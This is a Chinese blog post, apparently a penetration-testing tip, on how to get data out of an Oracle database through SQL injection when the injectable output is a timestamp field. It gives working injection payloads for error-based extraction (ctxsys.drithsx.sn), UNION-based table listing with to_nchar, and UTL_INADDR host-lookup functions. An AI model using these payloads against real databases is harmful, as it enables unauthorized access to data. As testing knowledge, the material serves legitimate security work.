当前位置:网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
2022-07-31 05:10:00 【不习惯有你】
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。

解决方法:
1.盲注
2.尝试报错注入
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3.尝试去转化类型
to_nchar 转化为varchar或varchar2类型
用法to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4.通过函数对字符处理转化为数字
切割字符串,转数字看回显
由于有字数要求,我看了一些其他的报错函数
1.UTL_INADDR.get_host_address环境中IP地址
具体用法:select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name返回环境中主机名
具体用法:
返回局域网内指定IP地址的主机名
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
返回intrenet中指定IP地址的网址
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
可以查看相关的内容Oracle显错注入函数_小明哥哥的技术博客_51CTO博客
边栏推荐
- uni-app进阶之创建组件/原生渲染【day9】
- 实验7 UDP与TCP对比
- find、filter、map的区别
- C语言教程(一)-准备
- leetcode-2321. 拼接数组的最大分数(差分+枚举)
- Redis Advanced - Cache Issues: Consistency, Penetration, Penetration, Avalanche, Pollution, etc.
- Qt Creator + CMake 运行调试总会自动 build 所有目标
- wpf wrapPanel居中并从左到右排列
- 剑指offer基础版 ----第31天
- gin框架学习-Gin框架和Gorm框架搭建一个简单的API微服务
猜你喜欢

leetcode-2321. 拼接数组的最大分数(差分+枚举)

剑指offer专项突击版 ---- 第1天

【C语言3个基本结构详解——顺序、选择、循环】

基于web3.0使用钱包Metamask的三方登陆

leetcode-每日一题745. 前缀和后缀搜索(哈希和字典树)

vulhub靶场学习日记hackme2

leetcode-每日一题735. 行星碰撞(栈模拟)

Anaconda configure environment directives

leetcode-每日一题1252. 奇数值单元格的数目(模拟优化)

Interviewer: If the order is not paid within 30 minutes, it will be automatically canceled. How to do this?
随机推荐
16 【打包上线 图片懒加载】
Redis Advanced - Cache Issues: Consistency, Penetration, Penetration, Avalanche, Pollution, etc.
PAT_乙级_真题练习_1007_素数对猜想
Interviewer, don't ask me to shake hands three times and wave four times again
tf.keras.utils.pad_sequences()
剑指offer专项突击版 ---- 第2天
The process and specific code of sending SMS verification code using flask framework
剑指offer专项突击版 --- 第 4 天
剑指offer专项突击版 ---第 5 天
Three-party login using wallet Metamask based on web3.0
运用flask框架发送短信验证码的流程及具体代码
Kubernetes certificate validity period modification
剑指offer基础版 --- 第22天
Kubernetes加入集群的TOKEN值过期
Quickly master concurrent programming --- the basics
gin框架学习-GORM框架进阶之CRUD接口(数据库增删改查操作)
12 【nextTick 过渡与动画】
gin框架学习-JWT认证
“档次法”——用于物品体积分布不均匀的01背包问题的求解方法
数据库学习笔记